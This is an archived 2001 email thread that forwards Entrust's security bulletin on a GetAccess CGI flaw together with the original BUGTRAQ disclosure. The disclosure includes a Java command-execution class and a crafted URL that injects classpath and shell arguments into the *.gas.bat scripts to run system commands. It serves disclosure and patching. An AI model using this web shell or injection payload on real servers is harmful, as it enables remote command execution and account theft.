I did not see Entrust answer posted to bugtraq so I'm sending it. Pavel M. -----Original Message----- From: GetAccess Support [mailto:getaccess.support@entrust.com] Sent: 30. července 2001 16:37 To: 'MARTAK,PAVEL (HP-Czechia,ex1)' Subject: RE: Entrust - getAccess Good morning Pavel. I've included the press release and patch details below. Please let me know if you need clarification. Sincerely, Jeff Entrust Security Bulletin E01-001 ================================== Subject: Entrust GetAccess(tm) CGI Script Vulnerability Originally posted: July 27, 2001 Summary ======= An internet newsgroup posting on BUGTRAQ has identified a vulnerability in Entrust GetAccess that could allow unauthorized execution of Java programs installed on GetAccess web servers. This vulnerability has been confirmed by Entrust and a patch is forthcoming. Detailed information on this issue has been posted to the Entrust customer extranet on both the Entrust GetAccess Portal (https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-00 1.html) and the Entrust Customer Support Extranet (https://www.entrust.com/support/resources/recentsecuritynotes.htm). If you have trouble reaching the portals, please call: within North America 877-754-7878, elsewhere 613-270-3700. A hotline has been established for the weekend of July 28th/29th, at +1 613 220 8357. Affected Software Versions ========================== - Entrust GetAccess, all versions and platforms - Specifically, servers running the Access Service, administration application, or runtimes. Patch Availability ================== Patches for this vulnerability will be posted to the Entrust customer support extranet on or before Sunday, July 29th 2001. ================== (c) Entrust Inc. 2001 Jeff McGrath Web Security Team getAccess Integration Entrust, Inc. "Securing the Internet" Customer Support Phone: 1 877 PKI SUPT mailto:support@entrust.com http://www.entrust.com -----Original Message----- From: MARTAK,PAVEL (HP-Czechia,ex1) [mailto:pavel_martak@hp.com] Sent: Monday, July 30, 2001 2:51 AM To: support@entrust.com Subject: FW: Entrust - getAccess This was announced in BUGTRAQ. PavelM -----Original Message----- From: rudi carell [mailto:rudicarell@hotmail.com] Sent: 27. července 2001 13:34 To: BUGTRAQ@SECURITYFOCUS.COM Subject: Entrust - getAccess hola friends, getAccess[tm] is used as a single-sign-on system often used for large internet-portals. --- snip (http://www.entrust.com) --- Entrust GetAccess[tm] offers the most comprehensive solution for consistently deploying and enforcing basic and enhanced security across online applications, from Web browsers, to enterprise applications and legacy database systems. --- snip --- problem description: due to missing input-validation it is possible to run(start) java-programs on the "getaccess"-machine. combined with public accessibly uploads or any other possibility to create class-files on the server this vulnerability c ould be used to run arbitrary system commands on the target machine( or change getAccess parameters and steal any user ac count you want BTW). it should also be possible(but not proven yet) to exploit default-,install- or demo classes within Java or getAccess whic h would make the file-upload(creation) part unneeded! (uninstall.class is very likely an effective DOS) Example: find exploitable getAccess-class(one which accepts params!) or upload a "command" programm: --- cut here (example cmd.java) --- import java.io.*; public class cmd { public static void main(String args[]) { s = null; try { Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]); BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream())); BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream())); System.out.println("Content-type: text/html\n\n"); while ((s = stdInput.readLine()) != null) { System.out.println(s); } while ((s = stdError.readLine()) != null) { System.out.println(s); } System.exit(0); } catch (IOException e) { e.printStackTrace(); System.exit(-1); } } } --- cut here --- later then .. a http-request to : http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/b in/ls%20-alsi .. will run "/whereever/cmd.class" and execute "/bin/ls -alsi" Summary: object: *.gas.bat (all the getAccess cgi-shell-scripts) class: input validation remote: yes vendor: has been informed with a separate e-mail ( entrust@entrust.com ) (and BTW. i would NEVER EVER recommand to use shell-scripts for authentication purposes!) nice day, rC rudicarell@hotmail.com security@freefly.com http://www.freefly.com/security/ _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
